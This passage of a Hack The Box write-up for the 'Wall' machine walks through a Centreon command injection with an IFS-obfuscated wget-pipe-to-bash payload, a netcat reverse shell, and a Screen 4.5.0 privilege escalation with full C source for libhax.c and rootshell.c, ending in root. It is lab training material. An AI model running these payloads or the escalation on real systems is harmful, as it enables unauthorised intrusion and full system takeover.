"nagios_bin": "wget${IFS}-qO-${IFS}http://10.10.xx.xx/a${IFS}|${IFS}bash;"
root@kali:~/Desktop/HTB/boxes/wall# python exploit.py http://wall.htb/centreon/ admin password1 10.10.xx.xx 1337
[+] Retrieving CSRF token to submit the login form
exploit.py:38: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual e
nvironment, it may use a different parser and behave differently.

The code that caused this warning is on line 38 of the file exploit.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.

  soup = BeautifulSoup(html_content)
[+] Login token is : ba28f431a995b4461731fb394eb01d79
[+] Logged In Sucssfully
[+] Retrieving Poller token
exploit.py:56: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual e
nvironment, it may use a different parser and behave differently.

The code that caused this warning is on line 56 of the file exploit.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.

  poller_soup = BeautifulSoup(poller_html)
[+] Poller token is : d5702ae3de1264b0692afcef86074f07
[+] Injecting Done, triggering the payload
[+] Check your netcat listener !
root@kali:~/Desktop/HTB/boxes/wall# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.10.157] 37862
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python             
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Wall:/usr/local/centreon/www$ ^Z
[1]+  Stopped                 nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/wall# stty raw -echo 
root@kali:~/Desktop/HTB/boxes/wall# nc -lvnp 1337

www-data@Wall:/usr/local/centreon/www$ export TERM=screen
www-data@Wall:/usr/local/centreon/www$ 

Screen 4.5.0 –> Root Shell –> User & Root Flags

There were two users on the box, shelby and sysmonitor. I couldn’t read the user flag as www-data:

www-data@Wall:/usr/local/centreon/www$ cd /home
www-data@Wall:/home$ ls -al
total 16
drwxr-xr-x  4 root       root       4096 Jul  4 00:38 .
drwxr-xr-x 23 root       root       4096 Jul  4 00:25 ..
drwxr-xr-x  6 shelby     shelby     4096 Jul 30 17:37 shelby
drwxr-xr-x  5 sysmonitor sysmonitor 4096 Jul  6 15:07 sysmonitor
www-data@Wall:/home$ cd shelby
www-data@Wall:/home/shelby$ cat user.txt 
cat: user.txt: Permission denied
www-data@Wall:/home/shelby$

I searched for suid binaries and saw screen-4.5.0, similar to the privesc in Flujab I used this exploit.
The exploit script didn’t work properly so I did it manually, I compiled the binaries on my box: libhax.c:

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

rootshell.c:

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
root@kali:~/Desktop/HTB/boxes/wall/privesc# nano libhax.c
root@kali:~/Desktop/HTB/boxes/wall/privesc# nano rootshell.c
root@kali:~/Desktop/HTB/boxes/wall/privesc# gcc -fPIC -shared -ldl -o libhax.so libhax.c
libhax.c: In function β€˜dropshell’:
libhax.c:7:5: warning: implicit declaration of function β€˜chmod’ [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~
root@kali:~/Desktop/HTB/boxes/wall/privesc# gcc -o rootshell rootshell.c
rootshell.c: In function β€˜main’:
rootshell.c:3:5: warning: implicit declaration of function β€˜setuid’ [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
rootshell.c:4:5: warning: implicit declaration of function β€˜setgid’ [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
rootshell.c:5:5: warning: implicit declaration of function β€˜seteuid’ [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of function β€˜setegid’ [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of function β€˜execvp’ [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in function β€˜execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]
root@kali:~/Desktop/HTB/boxes/wall/privesc#

Then I uploaded them to the box and did the rest of the exploit:

www-data@Wall:/home/shelby$ cd /tmp/
www-data@Wall:/tmp$ wget http://10.10.xx.xx/libhax.so
--2019-12-07 00:23:12--  http://10.10.xx.xx/libhax.so
Connecting to 10.10.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16144 (16K) [application/octet-stream]
Saving to: 'libhax.so'

libhax.so           100%[===================>]  15.77K  11.7KB/s    in 1.3s    

2019-12-07 00:23:14 (11.7 KB/s) - 'libhax.so' saved [16144/16144]

www-data@Wall:/tmp$ wget http://10.10.xx.xx/rootshell
--2019-12-07 00:23:20--  http://10.10.xx.xx/rootshell
Connecting to 10.10.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16832 (16K) [application/octet-stream]
Saving to: 'rootshell'

rootshell           100%[===================>]  16.44K  16.3KB/s    in 1.0s    

2019-12-07 00:23:22 (16.3 KB/s) - 'rootshell' saved [16832/16832]

www-data@Wall:/tmp$ 
www-data@Wall:/tmp$ cd /etc
www-data@Wall:/etc$ umask 000
www-data@Wall:/etc$ /bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
www-data@Wall:/etc$ /bin/screen-4.5.0 -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

www-data@Wall:/etc$ /tmp/rootshell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data),6000(centreon)
# 




And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Heist
Next Hack The Box write-up : Hack The Box - Smasher2

❌
❌